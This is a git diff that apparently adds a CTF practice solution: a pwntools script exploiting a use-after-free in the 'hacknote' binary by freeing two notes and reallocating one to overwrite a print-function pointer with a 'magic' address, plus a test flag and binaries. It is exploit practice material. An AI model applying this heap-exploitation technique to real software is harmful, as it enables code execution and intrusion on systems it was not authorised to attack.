diff --git a/.gitignore b/.gitignore index e74bc15..d5af811 100644 --- a/.gitignore +++ b/.gitignore @@ -33,7 +33,6 @@ peda*.txt *.dylib # Executables -*.exe *.out *.app *.i*86 @@ -47,7 +46,6 @@ peda*.txt # Kernel Module Compile Results *.mod* -*.cmd .tmp_versions/ modules.order Module.symvers diff --git a/UAF/hacknote/answer.py b/UAF/hacknote/answer.py new file mode 100644 index 0000000..4fc248a --- /dev/null +++ b/UAF/hacknote/answer.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os, base64, math, time +context(arch = "i386", os = "linux", log_level = "debug") + +def note_add(p, size, content): + p.recvuntil('Your choice :') + p.sendline('1') + p.recvuntil('Note size :') + p.sendline(str(size)) + p.recvuntil('Content :') + p.sendline(content) + +def note_delete(p, index): + p.recvuntil('Your choice :') + p.sendline('2') + p.recvuntil('Index :') + p.sendline(str(index)) + +def note_print(p, index): + p.recvuntil('Your choice :') + p.sendline('3') + p.recvuntil('Index :') + p.sendline(str(index)) + +# p = remote("hackme.inndy.tw", 7719) +p = process('./hacknote') +elf = ELF('./hacknote') +gdb_command = """ + b *0x80486ca + b *0x8048893 + b *0x80488a9 + b *0x804875c + """ +magic_addr = 0x08048986 +gdb.attach(p, gdb_command) + +note_add(p, 100, "abcdefghijklmn") +note_add(p, 100, "abcdefghijklmn") +note_delete(p, 0) +note_delete(p, 1) +note_add(p, 8, p32(magic_addr)) +note_print(p, 0) + +p.interactive() \ No newline at end of file diff --git a/UAF/hacknote/flag b/UAF/hacknote/flag new file mode 100644 index 0000000..1a77da5 --- /dev/null +++ b/UAF/hacknote/flag @@ -0,0 +1 @@ +flag{test success} diff --git a/UAF/hacknote/hacknote b/UAF/hacknote/hacknote new file mode 100755 index 0000000..d7ce4b0 Binary files /dev/null and b/UAF/hacknote/hacknote differ diff --git a/UAF/hacknote/hacknote.idb b/UAF/hacknote/hacknote.idb new file mode 100644 index 0000000..84c5cfd Binary files /dev/null and b/UAF/hacknote/hacknote.idb differ